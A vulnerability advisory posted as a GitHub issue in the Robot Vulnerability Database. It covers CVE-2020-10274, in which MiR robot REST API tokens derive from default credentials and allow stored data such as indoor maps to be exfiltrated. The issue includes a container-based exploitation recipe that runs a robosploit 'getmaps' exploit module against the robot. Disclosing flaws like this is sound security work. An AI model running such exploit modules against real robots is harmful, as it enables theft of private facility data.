Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

RVD#2556: MiR REST API allows for data exfiltration by unauthorized attackers (e.g. indoor maps) #2556

Open
rvd-bot opened this issue Jun 24, 2020 · 0 comments

Comments

@rvd-bot
Copy link
Contributor

rvd-bot commented Jun 24, 2020

id: 2556
title: 'RVD#2556: MiR REST API allows for data exfiltration by unauthorized attackers
  (e.g. indoor maps)'
type: vulnerability
description: The access tokens for the REST API are directly derived (sha256 and base64
  encoding) from the publicly available default credentials from the Control Dashboard
  (refer to CVE-2020-10270 for related flaws). This flaw in combination with CVE-2020-10273
  allows any attacker connected to the robot networks (wired or wireless) to exfiltrate
  all stored data (e.g. indoor mapping images) and associated metadata from the robot's
  database.
cwe: CWE-200
cve: CVE-2020-10274
keywords:
- MiR100, MiR200, MiR500, MiR250, MiR1000, ER200, ER-Lite, ER-Flex,
  ER-One, UVD
system: MiR100:v2.8.1.1 and before, MiR200, MiR250, MiR500, MiR1000, ER200,
  ER-Lite, ER-Flex, ER-One, UVD
vendor: Mobile Industrial Robots A/S, EasyRobotics, Enabled Robotics, UVD Robots
severity:
  rvss-score: 5.6
  rvss-vector: RVSS:1.0/AV:IN/AC:L/PR:L/UI:N/Y:Z/S:U/C:H/I:L/A:N/H:N
  severity-description: medium
  cvss-score: 7.1
  cvss-vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N
links:
- https://cwe.mitre.org/data/definitions/200.html
- https://github.com/aliasrobotics/RVD/issues/2556
flaw:
  phase: runtime-operation
  specificity: subject-specific
  architectural-location: application-specific code
  application: REST API
  subsystem: cognition
  package: N/A
  languages: N/A
  date-detected: 2020-05-03
  detected-by: Alias Robotics (group, https://aliasrobotics.com)
  detected-by-method: testing
  date-reported: '2020-06-24'
  reported-by: "Victor Mayoral Vilches (Alias Robotics)"
  reported-by-relationship: security researcher
  issue: https://github.com/aliasrobotics/RVD/issues/2556
  reproducibility: Always
  trace: Not disclosed
  reproduction: Not disclosed
  reproduction-image: Not disclosed
exploitation:
  description: Not disclosed
  exploitation-image: Not disclosed
  exploitation-vector: Not disclosed
  exploitation-recipe:
    networks:
    - network:
      - driver: overlay
      - name: mireth-network
      - encryption: false
    containers:
    - container:
      - name: mir100
      - modules:
        - base: registry.gitlab.com/aliasrobotics/offensive/alurity/robo_mir100:2.8.1.1
        - network: mireth-network
    - container:
      - name: attacker
      - modules:
        - base: registry.gitlab.com/aliasrobotics/offensive/alurity/comp_ros:latest
        - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/expl_robosploit/expl_robosploit:latest
        - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/deve_atom:latest
        - volume: registry.gitlab.com/aliasrobotics/offensive/alurity/reco_nmap:latest
        - network: mireth-network
    flow:
    - container:
      - name: attacker
      - window:
        - name: attacker
        - commands:
          - command: 'export TARGET=$(nslookup mir100 |  awk "NR==6{print$2}" | sed
              "s/Address: //g")'
          - command: ls -lh
          - command: echo "Waiting until the dashboard launches and robot initializes...";
              sleep 10
          - command: robosploit -m exploits/mir/rest/getmaps -s "target $TARGET"
          - command: ls -lh
    - container:
      - name: mir100
      - window:
        - name: setup
        - commands:
          - command: mkdir /var/run/sshd
          - command: /usr/sbin/sshd
          - command: /bin/sleep 5
          - command: sudo mkdir /run/lock
          - command: /etc/init.d/apache2 start
          - split: horizontal
          - command: /bin/sleep 2
          - command: python /usr/local/mir/software/robot/release/db_backup.py
          - command: /etc/init.d/mysql start
          - command: /bin/sleep 2
          - command: /usr/sbin/mysqld --verbose &
      - window:
        - name: ros
        - commands:
          - command: python /usr/local/mir/software/robot/release/db_backup.py
          - command: sudo apt-key adv --keyserver 'hkp://keyserver.ubuntu.com:80'
              --recv-key C1CF6E31E6BADE8868B172B4F42ED6FBAB17C654
          - command: sudo apt-get update
          - command: roslaunch mirCommon mir_bringup.launch
      - select: setup
    - attach: attacker
mitigation:
  description: Not disclosed
  pull-request: Not disclosed
  date-mitigation: null
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment